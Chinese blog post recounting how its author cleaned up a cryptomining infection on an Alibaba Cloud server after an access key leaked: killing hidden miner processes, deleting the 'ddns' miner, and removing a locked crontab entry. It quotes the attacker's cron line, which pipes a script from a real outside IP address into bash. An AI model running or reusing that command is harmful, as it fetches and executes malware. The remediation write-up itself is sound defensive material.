阿里云因Ak泄露,被攻击处理过程
根据阿里云后台安全预警,检查到系统出现紧急预警时间:恶意脚本代码执行,预警后发现SSh无法登录(ssh服务被杀掉),服务器瘫痪,重启服务器后能正常远程。
第一件事禁用掉泄露的AK,防止二次伤害
如果不想重启服务器可以通过阿里云的后台VNC应急远程登录到服务器,执行以下命令
systemctl start sshd
netstat -anpt |grep ssh
登录服务器后top发现CPU-100%,但是进程中午占用高得资源,考虑到有隐藏进程占用了cpu
安装htop命令
yum -y install htop
使用htop命令查看隐藏的进程,发现存在这大量的挖矿应用进程,根据进程找到目录所在位置,删除掉挖矿程序,并杀掉挖矿进程
挖矿程序在:/usr/share/ddns 使用rm -rf ddns进行删除
删除挖矿进程;kill -9 进程1 进程2 进程3........
此时CPU暂时恢复正常,但是过了30秒后,CPU再次上涨,此时htop查看进程,挖矿程序再次运行,ddns挖矿病毒再次运行,考虑系统中肯定存在后门再次下载了挖矿病毒
首先考虑是存在定时任务执行
使用 crontab -l 查看系统任务调度,果然存在一个远程下载的定时任务,这是个海外的地址
*/30 * * * * curl -fsSL http://209.141.42.48/d3f815/s/cronb.sh | bash > /dev/null 2>&1
删除调度任务,编辑/var/spool/cron/root文件
vi /var/spool/cron/root
但是
尝试修改root文件,将里面的定时任务删除,依旧报错
使用lsattr 命令查看被限制修改的文件,这个目录正好是crontab任务的文件,最后一层root代表的是用户名称,如果使用czw账号设置的定时任务那需要进入到czw目录下操作
这里的a代表Append Only,系统只允许在这个文件之后追加数据,不允许任何进程覆盖或截断这个文件,i 代表文件不能删除,不能更改,不能移动
因此我们需要把对应文件的-ia权限删除,使用如下指令删除,如果是-i权限,将下面指令换成-i即可
再次编辑文件,保存成功
删除掉调度任务后,再次重复上面的步骤,删除掉挖矿程序ddns,杀掉挖矿的后台进程
阿里云因Ak泄露,被攻击处理过程相关推荐
- 阿里云免费证书DV SSL申请过程记录
HTTPS应用越来越普遍,为了提高安全级别,很多情况都要求使用HTTPS. 以下为个人亲测,阿里云免费证书DV SSL申请过程记录,对于想申请免费证书的小伙伴,看过可能少走一些弯路. 1.购买证书 2 ...
- 阿里云出现源代码泄露企业 涉及万科等40家企业200余项目
本文来自铅笔道电子烟论坛:铅笔道 记者 | 付艳翠 编辑 | 吴晋娜 人工智能学习路线+实战训练 https://edu.csdn.net/topic/ai30?utm_source=csdn_bw ...
- dockerfile构建一个(python+flask+html)镜像 + 上传到阿里云私有仓库 + 部署到k8s---全过程
前言 因为之前根据一些网上的教程一个个部分实践过整个部署流程,但都是根据现有的程序/ymal文件等进行创建部署,未能根据自己特定的项目进行部署.因此,这篇博文,打算完整部署一个自己编写的python+ ...
- 基于阿里云服务器ECS的建站过程
以前个人网站一直放在新浪SAE上的,5月1号放假闲来无聊,看了下阿里云,发现学生云服务器ECS9.87元/月,1G内存,1核cpu,15G流量,40G内存.感觉阿里云的的人都是在用心在做产品呀,暖暖的 ...
- 记录一下我在阿里云自主申请软著的过程和体会
以前申请软著都是淘宝让人代办,一般400元左右,31工作日下证,代办人会帮忙排版. 这次尝试阿里云自主申请,300元31个工作日,资料需要自己排版,不过挺简单的,排版规则都很明确.过程如下: 2020 ...
- 解决阿里云服务器被植入挖矿脚本过程
文章目录 前言 一.服务器为什么会被告警挖矿? 二.怎么解决: 1.top 命令查看进程cpu 占用情况: 2.通过pid进程号,查找改程序所在的目录: 3. 强制删除脚本文件: 4. 强制杀死进程: ...
- 阿里云系列——7.阿里云IIS系列详解(过程+通用+最新)
网站部署之~阿里云系列汇总 http://www.cnblogs.com/dunitian/p/4958462.html 先讲IIS系列,Linux部署以后再继续讲 先打开主机管理平台,确认域名绑定 ...
- 阿里linux安装mysql_阿里云Linux Ubuntu系统安装mysql完整过程
1.下载mysql包 2.tar解压 [root@localhost /]#tar xzvf mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz 3.移动到/usr/ ...
- python-django 阿里云ECS服务器部署uwsgi+nginx过程解说
需求:在本地已经完成了一个博客系统/数据可视化系统的开发,需要部署到系统上,展示个人主页/个人作品 编程语言:Python 系统框架:Django 数据库:MySQL 服务架构:uwsgi+nginx ...
最新文章
- CVPR2021最新接收论文合集!22个方向100+篇论文汇总
- 用 Python 实现隐身,我可以
- Linux与JVM的内存关系分析
- 泽西岛/贾克斯RS:流式JSON
- 详解mysql什么时候不走索引
- [Liunx]Linux安装screenfetch
- 适合初学者的安卓开源项目_开源世界中初学者的颠簸之旅
- C#经典系列-键值对
- linux之openssh配置
- c语言怎么运行出星星,C语言打印星星的问题
- 用c语言实现数据结构算法将两个有序链表并为一个有序链表的算法,,(完整版)数据结构-习题集答案-(C语言版严蔚敏)...
- 笔记︱金融风险之欺诈分类以及银行防控体系简述
- IMU预积分推导——公式准备
- 中国39所985高校省级行政区分布-web数据可视化(d3.pack包含关系图)
- html删除学生数据,对学生信息进行删除网页html代码.doc
- ios12微信H5输入框软键盘关闭后,页面无法回到正常位置
- Hadoop-2.7.1+Zookeeper-3.4.8+HBase-1.2.1+Hive-2.0.0完全分布式集群
- 坚持与展望——科泰华捷董事长陈榕专访
- FHQ_TREAP学习笔记
- 交换机ARP代理详解